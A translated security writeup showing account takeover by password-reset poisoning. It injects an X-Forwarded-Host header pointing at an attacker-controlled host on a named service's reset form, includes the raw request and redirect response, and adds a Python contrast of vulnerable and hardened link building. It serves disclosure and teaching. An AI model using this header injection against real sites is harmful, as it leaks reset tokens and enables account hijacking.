安全矩阵
Account hijacking via Host header injection
Posted 2023-10-6 03:53:34
迪哥讲事, 2023-10-05 15:35, published in Jiangsu

Business context
This is a password reset feature.

Reproduction steps
Open the password reset page: https://login.newrelic.com/passwords/forgot

Enter the victim's email address, then click "Reset and email password".

Intercept the HTTP request in Burp Suite and add an X-Forwarded-Host header with a value like the following:

    attacker.com/.newrelic.com

The resulting link looks like this:

    https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811

The victim receives the malicious link in their email; when it is clicked, the user's password reset link/token is leaked to the attacker, resulting in complete account takeover.

The request looks like this:

    POST /passwords/forgot HTTP/1.1
    Host: login.newrelic.com
    X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 626
    Connection: close
    Referer: https://login.newrelic.com/passwords/forgot
    Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
    Upgrade-Insecure-Requests: 1



The response is as follows:

    HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-Length: 134
    Content-Type: text/html; charset=utf-8
    Date: Fri, 20 Sep 2019 00:49:19 GMT
    Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
    Server: nginx
    Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
    X-Content-Type-Options: nosniff
    X-Download-Options: noopen
    X-Frame-Options: DENY
    X-Permitted-Cross-Domain-Policies: none
    X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
    X-Runtime: 0.113080
    X-Xss-Protection: 1; mode=block
    Connection: close
    <html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>

Look at the attachments.
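The root cause shown above is a reset link whose host comes from a client-controlled header. The following added example (not New Relic's code; the canonical host, allowlist and token are constructed assumptions) puts the header-trusting pattern beside a hardened one and shows that the ".newrelic.com" in the injected value is only a path, so the browser connects to the attacker's host.

```python
from urllib.parse import urlsplit

# Constructed sample values modelled on the writeup: the forwarded-host
# value is the attacker's host followed by a path that merely resembles
# the legitimate domain.
CANONICAL_HOST = "login.newrelic.com"              # assumed server config
TRUSTED_HOSTS = frozenset({CANONICAL_HOST})        # assumed allowlist
ATTACKER_VALUE = "testing-now.000webhostapp.com/.newrelic.com"
TOKEN = "0" * 64                                   # constructed placeholder token

def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Builds the emailed link from the client-supplied X-Forwarded-Host
    (falling back to Host), so whoever sets that header decides which
    host receives the victim's token."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/passwords/reset/{token}"

def host_is_trusted(value: str) -> bool:
    """Exact allowlist match of a Host value with an optional numeric port.
    Values carrying a path, userinfo, spaces or several hosts are rejected."""
    if not value or any(c in value for c in "/@, "):
        return False
    host, _, port = value.partition(":")
    if port and not port.isdigit():
        return False
    return host.lower() in TRUSTED_HOSTS

def reset_link_hardened(headers: dict, token: str) -> str:
    """Rejects requests whose Host is not allowlisted and never consults
    forwarded headers: the link's host comes from configuration only."""
    if not host_is_trusted(headers.get("Host", "")):
        raise ValueError("untrusted Host header")
    return f"https://{CANONICAL_HOST}/passwords/reset/{token}"

def link_host(url: str) -> str:
    """Hostname a browser or mail client would actually connect to."""
    return urlsplit(url).hostname or ""

if __name__ == "__main__":
    req = {"Host": CANONICAL_HOST, "X-Forwarded-Host": ATTACKER_VALUE}
    print(link_host(reset_link_vulnerable(req, TOKEN)))  # testing-now.000webhostapp.com
    print(link_host(reset_link_hardened(req, TOKEN)))    # login.newrelic.com
```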


